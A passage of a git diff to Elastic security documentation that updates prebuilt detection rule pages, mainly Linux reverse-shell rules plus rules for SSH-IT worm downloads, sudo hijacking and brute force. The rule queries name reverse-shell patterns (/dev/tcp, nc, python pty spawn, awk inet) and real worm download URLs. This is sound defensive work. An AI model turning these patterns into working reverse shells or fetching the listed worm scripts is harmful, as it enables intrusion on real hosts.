"*dev/tcp/elk.stag.one/*", "*dev/tcp/kafka/*", "*/dev/tcp/$0/$1*", "*/dev/tcp/127.*", "*/dev/udp/127.*", "*/dev/tcp/localhost/*") and + not process.command_line : ( + "*/dev/tcp/sirh_db/*", "*/dev/tcp/remoteiot.com/*", "*dev/tcp/elk.stag.one/*", "*dev/tcp/kafka/*", + "*/dev/tcp/$0/$1*", "*/dev/tcp/127.*", "*/dev/udp/127.*", "*/dev/tcp/localhost/*", "*/dev/tcp/itom-vault/*") and not process.parent.command_line : "runc init" ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-background-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-background-process.asciidoc index 4620b6e67e..ccbe2f6329 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-background-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-background-process.asciidoc @@ -29,7 +29,7 @@ Monitors for the execution of background processes with process arguments capabl * Tactic: Execution * Data Source: Elastic Defend -*Version*: 1 +*Version*: 2 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-java.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-java.asciidoc index 15a75e0162..48f5db331c 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-java.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-java.asciidoc @@ -31,7 +31,7 @@ This detection rule identifies the execution of a Linux shell process from a Jav * Tactic: Execution * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -46,12 +46,14 @@ This detection rule identifies the execution of a Linux shell process from a Jav [source, js] ---------------------------------- sequence by host.id with maxspan=5s -[ network where host.os.type == "linux" and event.action in ("connection_accepted", "connection_attempted") and - process.executable : ("/usr/bin/java", "/bin/java", "/usr/lib/jvm/*", "/usr/java/*") and - destination.ip != null and destination.ip != "127.0.0.1" and destination.ip != "::1" ] by process.entity_id -[ process where host.os.type == "linux" and event.action == "exec" and - process.parent.executable : ("/usr/bin/java", "/bin/java", "/usr/lib/jvm/*", "/usr/java/*") and - process.parent.args : "-jar" and process.executable : "*sh" ] by process.parent.entity_id + [network where host.os.type == "linux" and event.action in ("connection_accepted", "connection_attempted") and + process.executable : ("/usr/bin/java", "/bin/java", "/usr/lib/jvm/*", "/usr/java/*") and + destination.ip != null and destination.ip != "127.0.0.1" and destination.ip != "::1" + ] by process.entity_id + [process where host.os.type == "linux" and event.action == "exec" and + process.parent.executable : ("/usr/bin/java", "/bin/java", "/usr/lib/jvm/*", "/usr/java/*") and + process.parent.args : "-jar" and process.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") + ] by process.parent.entity_id ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-suspicious-binary.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-suspicious-binary.asciidoc index 18cba2e95c..73d5f2ee96 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-suspicious-binary.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-suspicious-binary.asciidoc @@ -31,7 +31,7 @@ This detection rule detects the creation of a shell through a chain consisting o * Tactic: Execution * Data Source: Elastic Defend -*Version*: 4 +*Version*: 5 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-suspicious-child-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-suspicious-child-process.asciidoc index 94a8528325..54b6ce7100 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-suspicious-child-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-suspicious-child-process.asciidoc @@ -31,7 +31,7 @@ This detection rule detects the creation of a shell through a suspicious process * Tactic: Execution * Data Source: Elastic Defend -*Version*: 4 +*Version*: 5 *Rule authors*: @@ -46,20 +46,30 @@ This detection rule detects the creation of a shell through a suspicious process [source, js] ---------------------------------- sequence by host.id, process.entity_id with maxspan=1s -[ process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and ( - (process.name : "python*" and process.args : "-c") or - (process.name : "php*" and process.args : "-r") or - (process.name : "perl" and process.args : "-e") or - (process.name : "ruby" and process.args : ("-e", "-rsocket")) or - (process.name : "lua*" and process.args : "-e") or - (process.name : "openssl" and process.args : "-connect") or - (process.name : ("nc", "ncat", "netcat") and process.args_count >= 3) or - (process.name : "telnet" and process.args_count >= 3) or - (process.name : "awk")) and - process.parent.name : ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") ] -[ network where host.os.type == "linux" and event.type == "start" and event.action in ("connection_attempted", "connection_accepted") and - process.name : ("python*", "php*", "perl", "ruby", "lua*", "openssl", "nc", "netcat", "ncat", "telnet", "awk") and - destination.ip != null and destination.ip != "127.0.0.1" and destination.ip != "::1" ] + [process where host.os.type == "linux" and event.type == "start" and event.action in ("exec", "fork") and ( + (process.name : "python*" and process.args : "-c" and process.args : ( + "*import*pty*spawn*", "*import*subprocess*call*" + )) or + (process.name : "perl*" and process.args : "-e" and process.args : "*socket*" and process.args : ( + "*exec*", "*system*" + )) or + (process.name : "ruby*" and process.args : ("-e", "-rsocket") and process.args : ( + "*TCPSocket.new*", "*TCPSocket.open*" + )) or + (process.name : "lua*" and process.args : "-e" and process.args : "*socket.tcp*" and process.args : ( + "*io.popen*", "*os.execute*" + )) or + (process.name : "php*" and process.args : "-r" and process.args : "*fsockopen*" and process.args : "*/bin/*sh*") or + (process.name : ("awk", "gawk", "mawk", "nawk") and process.args : "*/inet/tcp/*") or + (process.name : "openssl" and process.args : "-connect") or + (process.name : ("nc", "ncat", "netcat") and process.args_count >= 3 and not process.args == "-z") or + (process.name : "telnet" and process.args_count >= 3) + ) and process.parent.name : ( + "bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "python*", "php*", "perl", "ruby", "lua*", + "openssl", "nc", "netcat", "ncat", "telnet", "awk")] + [network where host.os.type == "linux" and event.type == "start" and event.action in ("connection_attempted", "connection_accepted") and + process.name : ("python*", "php*", "perl", "ruby", "lua*", "openssl", "nc", "netcat", "ncat", "telnet", "awk") and + destination.ip != null and not cidrmatch(destination.ip, "127.0.0.0/8", "169.254.0.0/16", "224.0.0.0/4", "::1")] ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-udp.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-udp.asciidoc index 6d4b03a308..7734d9ccff 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-udp.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-udp.asciidoc @@ -26,11 +26,12 @@ This detection rule identifies suspicious network traffic patterns associated wi *Tags*: +* Domain: Endpoint * OS: Linux * Use Case: Threat Detection * Tactic: Execution -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -39,27 +40,6 @@ This detection rule identifies suspicious network traffic patterns associated wi *Rule license*: Elastic License v2 -==== Investigation guide - - -[source, markdown] ----------------------------------- -## Setup -This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. -``` -Kibana --> -Management --> -Integrations --> -Auditd Manager --> -Add Auditd Manager -``` -`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the "audit rules" configuration box or the "auditd rule files" box by specifying a file to read the audit rules from. -``` -For this detection rule no additional audit rules are required to be added to the integration. -``` -Add the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable. ----------------------------------- - ==== Rule query diff --git a/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell.asciidoc index 79a905532d..625e56ab46 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell.asciidoc @@ -31,7 +31,7 @@ This detection rule identifies suspicious network traffic patterns associated wi * Tactic: Execution * Data Source: Elastic Defend -*Version*: 4 +*Version*: 5 *Rule authors*: @@ -46,12 +46,13 @@ This detection rule identifies suspicious network traffic patterns associated wi [source, js] ---------------------------------- sequence by host.id with maxspan=1s -[ network where host.os.type == "linux" and event.type == "start" and event.action in ("connection_attempted", "connection_accepted") and - process.name : ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "socat") and - destination.ip != null and destination.ip != "127.0.0.1" and destination.ip != "::1" ] by process.entity_id -[ process where host.os.type == "linux" and event.type == "start" and event.action : ("exec", "fork") and - process.name : ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and - process.parent.name : ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "socat") ] by process.parent.entity_id + [network where host.os.type == "linux" and event.type == "start" and event.action in ("connection_attempted", "connection_accepted") and + process.name : ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "socat") and + destination.ip != null and destination.ip != "127.0.0.1" and destination.ip != "::1"] by process.entity_id + [process where host.os.type == "linux" and event.type == "start" and event.action in ("exec", "fork") and + process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and + process.parent.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "socat") and not + process.args : "*imunify360-agent*"] by process.parent.entity_id ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/potential-secure-file-deletion-via-sdelete-utility.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-secure-file-deletion-via-sdelete-utility.asciidoc index 1a01c4f4f1..278a83d1a0 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-secure-file-deletion-via-sdelete-utility.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-secure-file-deletion-via-sdelete-utility.asciidoc @@ -30,11 +30,12 @@ Detects file name patterns generated by the use of Sysinternals SDelete utility * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Impact * Data Source: Elastic Endgame * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -105,3 +106,11 @@ file where host.os.type == "windows" and event.type == "change" and file.name : ** Name: File Deletion ** ID: T1070.004 ** Reference URL: https://attack.mitre.org/techniques/T1070/004/ +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Destruction +** ID: T1485 +** Reference URL: https://attack.mitre.org/techniques/T1485/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-shadow-file-read-via-command-line-utilities.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-shadow-file-read-via-command-line-utilities.asciidoc index c0fa2d0dda..245f813e72 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-shadow-file-read-via-command-line-utilities.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-shadow-file-read-via-command-line-utilities.asciidoc @@ -34,7 +34,7 @@ Identifies access to the /etc/shadow file via the commandline using standard sys * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-shell-via-wildcard-injection-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-shell-via-wildcard-injection-detected.asciidoc index a4d20bd4df..f65f2ec4b7 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-shell-via-wildcard-injection-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-shell-via-wildcard-injection-detected.asciidoc @@ -32,7 +32,7 @@ This rule monitors for the execution of a set of linux binaries, that are potent * Tactic: Execution * Data Source: Elastic Defend -*Version*: 2 +*Version*: 3 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-ssh-it-ssh-worm-downloaded.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-ssh-it-ssh-worm-downloaded.asciidoc new file mode 100644 index 0000000000..c4cdc2b936 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-ssh-it-ssh-worm-downloaded.asciidoc @@ -0,0 +1,78 @@ +[[potential-ssh-it-ssh-worm-downloaded]] +=== Potential SSH-IT SSH Worm Downloaded + +Identifies processes that are capable of downloading files with command line arguments containing URLs to SSH-IT's autonomous SSH worm. This worm intercepts outgoing SSH connections every time a user uses ssh. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.thc.org/ssh-it/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Data Source: Elastic Defend +* Data Source: Elastic Endgame + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and +process.name in ("curl", "wget") and process.args : ( + "https://thc.org/ssh-it/x", "http://nossl.segfault.net/ssh-it-deploy.sh", "https://gsocket.io/x", + "https://thc.org/ssh-it/bs", "http://nossl.segfault.net/bs" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: SSH +** ID: T1021.004 +** Reference URL: https://attack.mitre.org/techniques/T1021/004/ +* Technique: +** Name: Remote Service Session Hijacking +** ID: T1563 +** Reference URL: https://attack.mitre.org/techniques/T1563/ +* Sub-technique: +** Name: SSH Hijacking +** ID: T1563.001 +** Reference URL: https://attack.mitre.org/techniques/T1563/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-successful-linux-ftp-brute-force-attack-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-successful-linux-ftp-brute-force-attack-detected.asciidoc index c15b239d8e..b746db6f51 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-successful-linux-ftp-brute-force-attack-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-successful-linux-ftp-brute-force-attack-detected.asciidoc @@ -29,7 +29,7 @@ An FTP (file transfer protocol) brute force attack is a method where an attacker * Use Case: Threat Detection * Tactic: Credential Access -*Version*: 2 +*Version*: 3 *Rule authors*: @@ -38,41 +38,6 @@ An FTP (file transfer protocol) brute force attack is a method where an attacker *Rule license*: Elastic License v2 -==== Investigation guide - - -[source, markdown] ----------------------------------- -### Auditbeat Setup -Auditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations. - -#### The following steps should be executed in order to add the Auditbeat for Linux System: -- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages. -- To install the APT and YUM repositories follow the setup instructions in this {security-guide}/beats/auditbeat/current/setup-repositories.html[helper guide]. -- To run Auditbeat on Docker follow the setup instructions in the {security-guide}/beats/auditbeat/current/running-on-docker.html[helper guide]. -- To run Auditbeat on Kubernetes follow the setup instructions in the {security-guide}/beats/auditbeat/current/running-on-kubernetes.html[helper guide]. -- For complete Setup and Run Auditbeat information refer to the {security-guide}/beats/auditbeat/current/setting-up-and-running.html[helper guide]. - -### Auditd Manager Integration Setup -The Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel. -Auditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. - -#### The following steps should be executed in order to add the Elastic Agent System integration "auditd_manager" on a Linux System: -- Go to the Kibana home page and click Add integrations. -- In the query bar, search for Auditd Manager and select the integration to see more details about it. -- Click Add Auditd Manager. -- Configure the integration name and optionally add a description. -- Review optional and advanced settings accordingly. -- Add the newly installed `auditd manager` to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable. -- Click Save and Continue. -- For more details on the integeration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager). - -#### Rule Specific Setup Note -Auditd Manager subscribes to the kernel and receives events as they occur without any additional configuration. -However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the "audit rules" configuration box or the "auditd rule files" box by specifying a file to read the audit rules from. -- For this detection rule no additional audit rules are required to be added to the integration. ----------------------------------- - ==== Rule query diff --git a/docs/detections/prebuilt-rules/rule-details/potential-successful-linux-rdp-brute-force-attack-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-successful-linux-rdp-brute-force-attack-detected.asciidoc index fcbf25a5aa..93774f6658 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-successful-linux-rdp-brute-force-attack-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-successful-linux-rdp-brute-force-attack-detected.asciidoc @@ -29,7 +29,7 @@ An RDP (Remote Desktop Protocol) brute force attack involves an attacker repeate * Use Case: Threat Detection * Tactic: Credential Access -*Version*: 2 +*Version*: 3 *Rule authors*: @@ -38,41 +38,6 @@ An RDP (Remote Desktop Protocol) brute force attack involves an attacker repeate *Rule license*: Elastic License v2 -==== Investigation guide - - -[source, markdown] ----------------------------------- -### Auditbeat Setup -Auditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations. - -#### The following steps should be executed in order to add the Auditbeat for Linux System: -- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages. -- To install the APT and YUM repositories follow the setup instructions in this {security-guide}/beats/auditbeat/current/setup-repositories.html[helper guide]. -- To run Auditbeat on Docker follow the setup instructions in the {security-guide}/beats/auditbeat/current/running-on-docker.html[helper guide]. -- To run Auditbeat on Kubernetes follow the setup instructions in the {security-guide}/beats/auditbeat/current/running-on-kubernetes.html[helper guide]. -- For complete Setup and Run Auditbeat information refer to the {security-guide}/beats/auditbeat/current/setting-up-and-running.html[helper guide]. - -### Auditd Manager Integration Setup -The Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel. -Auditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. - -#### The following steps should be executed in order to add the Elastic Agent System integration "auditd_manager" on a Linux System: -- Go to the Kibana home page and click Add integrations. -- In the query bar, search for Auditd Manager and select the integration to see more details about it. -- Click Add Auditd Manager. -- Configure the integration name and optionally add a description. -- Review optional and advanced settings accordingly. -- Add the newly installed `auditd manager` to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable. -- Click Save and Continue. -- For more details on the integeration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager). - -#### Rule Specific Setup Note -Auditd Manager subscribes to the kernel and receives events as they occur without any additional configuration. -However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the "audit rules" configuration box or the "auditd rule files" box by specifying a file to read the audit rules from. -- For this detection rule no additional audit rules are required to be added to the integration. ----------------------------------- - ==== Rule query diff --git a/docs/detections/prebuilt-rules/rule-details/potential-successful-ssh-brute-force-attack.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-successful-ssh-brute-force-attack.asciidoc index 07d59866b5..fdd3fb4a0f 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-successful-ssh-brute-force-attack.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-successful-ssh-brute-force-attack.asciidoc @@ -29,7 +29,7 @@ Identifies multiple SSH login failures followed by a successful one from the sam * Use Case: Threat Detection * Tactic: Credential Access -*Version*: 7 +*Version*: 8 *Rule authors*: @@ -80,7 +80,7 @@ The rule identifies consecutive SSH login failures followed by a successful logi [source, js] ---------------------------------- -sequence by host.id, source.ip, user.name with maxspan=3s +sequence by host.id, source.ip, user.name with maxspan=15s [authentication where host.os.type == "linux" and event.action in ("ssh_login", "user_login") and event.outcome == "failure" and source.ip != null and source.ip != "0.0.0.0" and source.ip != "::" ] with runs=10 diff --git a/docs/detections/prebuilt-rules/rule-details/potential-sudo-hijacking-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-sudo-hijacking-detected.asciidoc index 5ce17a9e7b..cdc82c937b 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-sudo-hijacking-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-sudo-hijacking-detected.asciidoc @@ -3,7 +3,7 @@ Identifies the creation of a sudo binary located at /usr/bin/sudo. Attackers may hijack the default sudo binary and replace it with a custom binary or script that can read the user's password in clear text to escalate privileges or enable persistence onto the system every time the sudo binary is executed. -*Rule type*: eql +*Rule type*: new_terms *Rule indices*: @@ -34,7 +34,7 @@ Identifies the creation of a sudo binary located at /usr/bin/sudo. Attackers may * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 2 +*Version*: 103 *Rule authors*: @@ -48,7 +48,8 @@ Identifies the creation of a sudo binary located at /usr/bin/sudo. Attackers may [source, js] ---------------------------------- -file where event.type in ("creation", "file_create_event") and file.path == "/usr/bin/sudo" +host.os.type:linux and event.category:file and event.type:("creation" or "file_create_event") and +file.path:("/usr/bin/sudo" or "/bin/sudo") and not process.name:(docker or dockerd) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/potential-sudo-privilege-escalation-via-cve-2019-14287.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-sudo-privilege-escalation-via-cve-2019-14287.asciidoc index fd5de28c25..99f2b3f921 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-sudo-privilege-escalation-via-cve-2019-14287.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-sudo-privilege-escalation-via-cve-2019-14287.asciidoc @@ -32,7 +32,7 @@ This rule monitors for the execution of a suspicious sudo command that is levera * Data Source: Elastic Defend * Use Case: Vulnerability -*Version*: 1 +*Version*: 2 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-sudo-token-manipulation-via-process-injection.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-sudo-token-manipulation-via-process-injection.asciidoc index 3519f4f3a3..ed709f569b 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-sudo-token-manipulation-via-process-injection.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-sudo-token-manipulation-via-process-injection.asciidoc @@ -31,7 +31,7 @@ This rule detects potential sudo token manipulation attacks through process inje * Tactic: Privilege Escalation * Data Source: Elastic Defend -*Version*: 2 +*Version*: 3 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-suspicious-debugfs-root-device-access.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-suspicious-debugfs-root-device-access.asciidoc index 8e560d1cec..79a4ec6a4e 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-suspicious-debugfs-root-device-access.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-suspicious-debugfs-root-device-access.asciidoc @@ -33,7 +33,7 @@ This rule monitors for the usage of the built-in Linux DebugFS utility to access * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 2 +*Version*: 3 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-suspicious-file-edit.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-suspicious-file-edit.asciidoc index 0c252ba61f..c9613a9f22 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-suspicious-file-edit.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-suspicious-file-edit.asciidoc @@ -18,7 +18,7 @@ This rule monitors for the potential edit of a suspicious file. In Linux, when e *Searches indices from*: now-119m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) -*Maximum alerts per execution*: 100 +*Maximum alerts per execution*: 1 *References*: None @@ -33,7 +33,7 @@ This rule monitors for the potential edit of a suspicious file. In Linux, when e * Rule Type: BBR * Data Source: Elastic Defend -*Version*: 2 +*Version*: 3 *Rule authors*: @@ -52,9 +52,9 @@ file.path : ( /* common interesting files and locations */ "/etc/.shadow.swp", "/etc/.shadow-.swp", "/etc/.shadow~.swp", "/etc/.gshadow.swp", "/etc/.gshadow-.swp", "/etc/.passwd.swp", "/etc/.pwd.db.swp", "/etc/.master.passwd.swp", "/etc/.spwd.db.swp", "/etc/security/.opasswd.swp", - "/etc/.hosts.swp", "/etc/.environment.swp", "/etc/.profile.swp", "/etc/sudoers.d/.*.swp", - "/etc/ld.so.conf.d/.*.swp", "/etc/init.d/.*.swp", "/etc/.rc.local.swp", "/etc/rc*.d/.*.swp", - "/dev/shm/.*.swp", "/etc/update-motd.d/.*.swp", "/usr/lib/update-notifier/.*.swp", + "/etc/.environment.swp", "/etc/.profile.swp", "/etc/sudoers.d/.*.swp", "/etc/ld.so.conf.d/.*.swp", + "/etc/init.d/.*.swp", "/etc/.rc.local.swp", "/etc/rc*.d/.*.swp", "/dev/shm/.*.swp", "/etc/update-motd.d/.*.swp", + "/usr/lib/update-notifier/.*.swp", /* service, timer, want, socket and lock files */ "/etc/systemd/system/.*.swp", "/usr/local/lib/systemd/system/.*.swp", "/lib/systemd/system/.*.swp", diff --git a/docs/detections/prebuilt-rules/rule-details/potential-syn-based-network-scan-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-syn-based-network-scan-detected.asciidoc index 9b06d734ef..ba0a4b2d30 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-syn-based-network-scan-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-syn-based-network-scan-detected.asciidoc @@ -21,7 +21,7 @@ This rule identifies a potential SYN-Based port scan. A SYN port scan is a techn *Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) -*Maximum alerts per execution*: 100 +*Maximum alerts per execution*: 5 *References*: None @@ -32,7 +32,7 @@ This rule identifies a potential SYN-Based port scan. A SYN port scan is a techn * Tactic: Reconnaissance * Use Case: Network Security Monitoring -*Version*: 3 +*Version*: 4 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-unauthorized-access-via-wildcard-injection-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-unauthorized-access-via-wildcard-injection-detected.asciidoc index 797694334e..5fd8d87492 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-unauthorized-access-via-wildcard-injection-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-unauthorized-access-via-wildcard-injection-detected.asciidoc @@ -34,7 +34,7 @@ This rule monitors for the execution of the "chown" and "chmod" commands with co * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 2 +*Version*: 3 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-upgrade-of-non-interactive-shell.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-upgrade-of-non-interactive-shell.asciidoc new file mode 100644 index 0000000000..28b516b863 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-upgrade-of-non-interactive-shell.asciidoc @@ -0,0 +1,69 @@ +[[potential-upgrade-of-non-interactive-shell]] +=== Potential Upgrade of Non-interactive Shell + +Identifies when a non-interactive terminal (tty) is being upgraded to a fully interactive shell. Attackers may upgrade a simple reverse shell to a fully interactive tty after obtaining initial access to a host, in order to obtain a more stable connection. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action in ("exec", "exec_event") and event.type == "start" and ( + (process.name == "stty" and process.args == "raw" and process.args == "-echo" and process.args_count >= 3) or + (process.name == "script" and process.args in ("-qc", "-c") and process.args == "/dev/null" and + process.args_count == 4) +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-windows-error-manager-masquerading.asciidoc 